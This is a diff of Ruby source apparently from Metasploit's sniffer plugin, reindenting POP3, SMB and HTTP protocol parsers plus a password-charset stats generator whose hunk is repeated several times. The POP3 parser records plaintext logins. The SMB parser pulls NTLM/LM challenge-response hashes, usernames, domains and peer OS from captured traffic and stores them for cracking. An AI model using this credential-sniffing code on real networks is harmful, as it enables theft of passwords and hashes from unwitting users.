-							# Its the first +OK must include the banner, worst case its just +OK
-							s[:info]  = matches
-							s[:proto] = "tcp"
-							s[:name]  = "pop3"
-							report_service(s)
+      case matched
+        when :ok
+          # Last command was successful, in addition most servers transmit a banner with the first +OK
+          case s[:last]
+            when nil
+              # Its the first +OK must include the banner, worst case its just +OK
+              s[:info]  = matches
+              s[:proto] = "tcp"
+              s[:name]  = "pop3"
+              report_service(s)

-						when :user
-							# When the last command was a username login
-							# We might keep track on this one in future
-						when :pass
-							# Perfect we get an +OK after a PASS command this means right password given :-)
+            when :user
+              # When the last command was a username login
+              # We might keep track on this one in future
+            when :pass
+              # Perfect we get an +OK after a PASS command this means right password given :-)

-							s[:proto] = "tcp"
-							s[:name]  = "pop3"
-							s[:extra] = "Successful Login. Banner: #{s[:banner]}"
-							report_auth_info(s)
-							print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              s[:proto] = "tcp"
+              s[:name]  = "pop3"
+              s[:extra] = "Successful Login. Banner: #{s[:banner]}"
+              report_auth_info(s)
+              print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-							# Remove it form the session objects so freeup
-							sessions.delete(s[:session])
+              # Remove it form the session objects so freeup
+              sessions.delete(s[:session])

-						when :quit
-							# The session is terminated by the user just delete is as well
-							sessions.delete(s[:session])
-					end
-					s[:last]=:ok
+            when :quit
+              # The session is terminated by the user just delete is as well
+              sessions.delete(s[:session])
+          end
+          s[:last]=:ok

-				when :err
-					case s[:last]
-						when :pass
-							# Oops got a -ERR after a pass so its crap ignore the pass
-							# But report it, might be helpfull for guessing :-)
+        when :err
+          case s[:last]
+            when :pass
+              # Oops got a -ERR after a pass so its crap ignore the pass
+              # But report it, might be helpfull for guessing :-)

-							s[:proto]="pop3"
-							s[:extra]="Failed Login. Banner: #{s[:banner]}"
-							report_auth_info(s)
-							print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
-							s[:pass]=""
-					end
-				when nil
-					# No matches, no saved state
-				else
-					s[:last]=matched
-					sessions[s[:session]].merge!({k => matches})
-			end # end case matched
-		end # end of each_key
-	end # end of parse
+              s[:proto]="pop3"
+              s[:extra]="Failed Login. Banner: #{s[:banner]}"
+              report_auth_info(s)
+              print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              s[:pass]=""
+          end
+        when nil
+          # No matches, no saved state
+        else
+          s[:last]=matched
+          sessions[s[:session]].merge!({k => matches})
+      end # end case matched
+    end # end of each_key
+  end # end of parse
 end

@@ -6,206 +6,206 @@

 #Memo : 
 #FOR SMBV1
-	# Authentification without extended security set
-		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
-		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
-		#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
-		#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
+  # Authentification without extended security set
+    #1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
+    #2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
+    #3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
+    #4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok

-	# Authentification with extended security set
-		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-		#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
-		#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
-		#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
-		#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+  # Authentification with extended security set
+    #1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+    #2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+    #3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
+    #4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
+    #5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
+    #6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
 #FOR SMBV2
-	#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 
+  #SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 

 class SnifferSMB < BaseProtocolParser

-	def register_sigs
-		self.sigs = {
-			:smb1_negotiate		=> /\xffSMB\x72/n,
-			:smb1_setupandx		=> /\xffSMB\x73/n,
-			#:smb2_negotiate	=> /\xFESMB\x40\x00(.){6}\x00\x00/n,
-			:smb2_setupandx		=> /\xFESMB\x40\x00(.){6}\x01\x00/n
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :smb1_negotiate		=> /\xffSMB\x72/n,
+      :smb1_setupandx		=> /\xffSMB\x73/n,
+      #:smb2_negotiate	=> /\xFESMB\x40\x00(.){6}\x00\x00/n,
+      :smb2_setupandx		=> /\xFESMB\x40\x00(.){6}\x01\x00/n
+    }
+  end

-	def parse(pkt)
-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
-		s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
+  def parse(pkt)
+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
+    s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+      end

-			case matched
-			when :smb1_negotiate
-				payload = pkt.payload.dup
-				wordcount = payload[36,1].unpack("C")[0]
-				#negotiate response
-				if wordcount == 17
-					flags2 = payload[14,2].unpack("v")[0]
-					#the server challenge is here
-					if flags2 & 0x800 == 0
-						s[:challenge] = payload[73,8].unpack("H*")[0]
-						s[:last]  = :smb1_negotiate
-					end
-				end
+      case matched
+      when :smb1_negotiate
+        payload = pkt.payload.dup
+        wordcount = payload[36,1].unpack("C")[0]
+        #negotiate response
+        if wordcount == 17
+          flags2 = payload[14,2].unpack("v")[0]
+          #the server challenge is here
+          if flags2 & 0x800 == 0
+            s[:challenge] = payload[73,8].unpack("H*")[0]
+            s[:last]  = :smb1_negotiate
+          end
+        end

-			when :smb1_setupandx
-				s[:smb_version]  = "SMBv1"
-				parse_sessionsetup(pkt, s)
-			when :smb2_setupandx
-				s[:smb_version]  = "SMBv2"
-				parse_sessionsetup(pkt, s)
-			when nil
-				# No matches, no saved state
-			else
-				sessions[s[:session]].merge!({k => matches})
-			end # end case matched
+      when :smb1_setupandx
+        s[:smb_version]  = "SMBv1"
+        parse_sessionsetup(pkt, s)
+      when :smb2_setupandx
+        s[:smb_version]  = "SMBv2"
+        parse_sessionsetup(pkt, s)
+      when nil
+        # No matches, no saved state
+      else
+        sessions[s[:session]].merge!({k => matches})
+      end # end case matched

-		end # end of each_key
-	end # end of parse
+    end # end of each_key
+  end # end of parse

-	#ntlmv1, ntlmv2 or ntlm2_session
-	def detect_ntlm_ver(lmhash, ntlmhash)
-		return "NTLMv2" if ntlmhash.length > 48
-		if lmhash.length == 48 and ntlmhash.length == 48
-			if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
-				return "NTLM2_SESSION"
-			else
-				return "NTLMv1"
-			end
-		else
-			raise RuntimeError, "Unknow hash type"
-		end
-	end
+  #ntlmv1, ntlmv2 or ntlm2_session
+  def detect_ntlm_ver(lmhash, ntlmhash)
+    return "NTLMv2" if ntlmhash.length > 48
+    if lmhash.length == 48 and ntlmhash.length == 48
+      if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
+        return "NTLM2_SESSION"
+      else
+        return "NTLMv1"
+      end
+    else
+      raise RuntimeError, "Unknow hash type"
+    end
+  end

-	def parse_sessionsetup(pkt, s)
-		payload = pkt.payload.dup
-		ntlmpayload = payload[/NTLMSSP\x00.*/m]
-		if ntlmpayload
-			ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
-			case ntlmmessagetype
-			when 2 # challenge
-				s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
-				s[:last] = :ntlm_type2
-			when 3 # auth
-				if s[:last] == :ntlm_type2
-					lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
-					lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
-					ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
-					ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
-					domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
-					domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
-					usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
-					usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
+  def parse_sessionsetup(pkt, s)
+    payload = pkt.payload.dup
+    ntlmpayload = payload[/NTLMSSP\x00.*/m]
+    if ntlmpayload
+      ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
+      case ntlmmessagetype
+      when 2 # challenge
+        s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
+        s[:last] = :ntlm_type2
+      when 3 # auth
+        if s[:last] == :ntlm_type2
+          lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
+          lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
+          ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
+          ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
+          domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
+          domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
+          usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
+          usroffset = 	ntlmpayload[40, 2].unpack("v")[0]

-					s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
-					s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
-					s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
-					s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
+          s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
+          s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
+          s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
+          s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''

-					secbloblength = payload[51,2].unpack("v")[0]
-					names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-					s[:peer_os]   = names[0] || ''
-					s[:peer_lm]   = names[1] || ''
-					s[:last] = :ntlm_type3
-				end
-			end
-		else
-			wordcount = payload[36,1].unpack("C")[0]
-			#authentification without smb extended security (smbmount, msf server capture)
-			if wordcount == 13 and s[:last]  == :smb1_negotiate and s[:smb_version]  == "SMBv1"
-				lmlength = 	payload[51,2].unpack("v")[0]
-				ntlmlength = 	payload[53,2].unpack("v")[0]
-				s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
-				s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
-			
-				names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+          secbloblength = payload[51,2].unpack("v")[0]
+          names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+          s[:peer_os]   = names[0] || ''
+          s[:peer_lm]   = names[1] || ''
+          s[:last] = :ntlm_type3
+        end
+      end
+    else
+      wordcount = payload[36,1].unpack("C")[0]
+      #authentification without smb extended security (smbmount, msf server capture)
+      if wordcount == 13 and s[:last]  == :smb1_negotiate and s[:smb_version]  == "SMBv1"
+        lmlength = 	payload[51,2].unpack("v")[0]
+        ntlmlength = 	payload[53,2].unpack("v")[0]
+        s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
+        s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
+      
+        names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }

-				s[:user] = names[0]
-				s[:domain]   = names[1]
-				s[:peer_os]   = names[2]
-				s[:peer_lm]   = names[3]
-				s[:last] = :smb_no_ntlm
-			else
-				#answer from server
-				if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
-					#do not output anonymous/guest logging
-					unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
-						#set lmhash to a default value if not provided						   	
-						s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
-						s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
+        s[:user] = names[0]
+        s[:domain]   = names[1]
+        s[:peer_os]   = names[2]
+        s[:peer_lm]   = names[3]
+        s[:last] = :smb_no_ntlm
+      else
+        #answer from server
+        if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
+          #do not output anonymous/guest logging
+          unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
+            #set lmhash to a default value if not provided						   	
+            s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
+            s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]

-						smb_status = payload[9,4].unpack("V")[0]
-						if smb_status == 0 # success
+            smb_status = payload[9,4].unpack("V")[0]
+            if smb_status == 0 # success

-							ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
+              ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])

-							logmessage =
-								"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
-								"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
-								"SERVER CHALLENGE:#{s[:challenge]} " + 
-								"\nLMHASH:#{s[:lmhash]} " + 
-								"\nNTHASH:#{s[:ntlmhash]}\n"
-							print_status(logmessage)
+              logmessage =
+                "#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
+                "USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
+                "SERVER CHALLENGE:#{s[:challenge]} " + 
+                "\nLMHASH:#{s[:lmhash]} " + 
+                "\nNTHASH:#{s[:ntlmhash]}\n"
+              print_status(logmessage)

-							src_ip = s[:client_host]
-							dst_ip = s[:host]
-							# know this is ugly , last code added :-/
-							smb_db_type_hash = case ntlm_ver
-							       when "NTLMv1" 		then "smb_netv1_hash"
-							       when "NTLM2_SESSION" 	then "smb_netv1_hash"
-							       when "NTLMv2" 		then "smb_netv2_hash"
-							       end
-							# DB reporting
-							report_auth_info(
-								:host  => dst_ip,
-								:port => 445,
-								:sname => 'smb',
-								:user => s[:user],
-								:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
-								:type => smb_db_type_hash,
-								:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
-								:active => true
-							)
+              src_ip = s[:client_host]
+              dst_ip = s[:host]
+              # know this is ugly , last code added :-/
+              smb_db_type_hash = case ntlm_ver
+                     when "NTLMv1" 		then "smb_netv1_hash"
+                     when "NTLM2_SESSION" 	then "smb_netv1_hash"
+                     when "NTLMv2" 		then "smb_netv2_hash"
+                     end
+              # DB reporting
+              report_auth_info(
+                :host  => dst_ip,
+                :port => 445,
+                :sname => 'smb',
+                :user => s[:user],
+                :pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
+                :type => smb_db_type_hash,
+                :proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
+                :active => true
+              )

-							report_note(
-								:host  => src_ip,
-								:type  => "smb_peer_os",
-								:data  => s[:peer_os]
-							) if (s[:peer_os] and s[:peer_os].strip.length > 0)
+              report_note(
+                :host  => src_ip,
+                :type  => "smb_peer_os",
+                :data  => s[:peer_os]
+              ) if (s[:peer_os] and s[:peer_os].strip.length > 0)

-							report_note(
-								:host  => src_ip,
-								:type  => "smb_peer_lm",
-								:data  => s[:peer_lm]
-							) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
+              report_note(
+                :host  => src_ip,
+                :type  => "smb_peer_lm",
+                :data  => s[:peer_lm]
+              ) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)

-							report_note(
-								:host  => src_ip,
-								:type  => "smb_domain",
-								:data  => s[:domain]
-							) if (s[:domain] and s[:domain].strip.length > 0)
+              report_note(
+                :host  => src_ip,
+                :type  => "smb_domain",
+                :data  => s[:domain]
+              ) if (s[:domain] and s[:domain].strip.length > 0)

-						end
-					end
-				end
-				s[:last] = nil
-				sessions.delete(s[:session])
-			end
-		end
-	end
+            end
+          end
+        end
+        s[:last] = nil
+        sessions.delete(s[:session])
+      end
+    end
+  end
 end
@@ -6,43 +6,43 @@

 # Sniffer class for GET URL's
 class SnifferURL < BaseProtocolParser
-	def register_sigs
-		self.sigs = {
-			:get		=> /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
-			:webhost	=> /^HOST\:\s+([^\n\r]+)/i,
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :get		=> /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
+      :webhost	=> /^HOST\:\s+([^\n\r]+)/i,
+    }
+  end

-	def parse(pkt)
-		# We want to return immediantly if	we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
-		s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
+  def parse(pkt)
+    # We want to return immediantly if	we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
+    s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))

-		self.sigs.each_key do |k|
+    self.sigs.each_key do |k|

-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-				sessions[s[:session]].merge!({k => matches})
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+        sessions[s[:session]].merge!({k => matches})
+      end

-			case matched
-			when :webhost
-				sessions[s[:session]].merge!({k => matches})
-				if(s[:get])
-					print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
-					sessions.delete(s[:session])
-					return
-				end
-			when nil
-				# No matches, no saved state
-			end # end case matched
-		end # end of each_key
-	end # end of parse
+      case matched
+      when :webhost
+        sessions[s[:session]].merge!({k => matches})
+        if(s[:get])
+          print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
+          sessions.delete(s[:session])
+          return
+        end
+      when nil
+        # No matches, no saved state
+      end # end case matched
+    end # end of each_key
+  end # end of parse
 end # end of URL sniffer

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
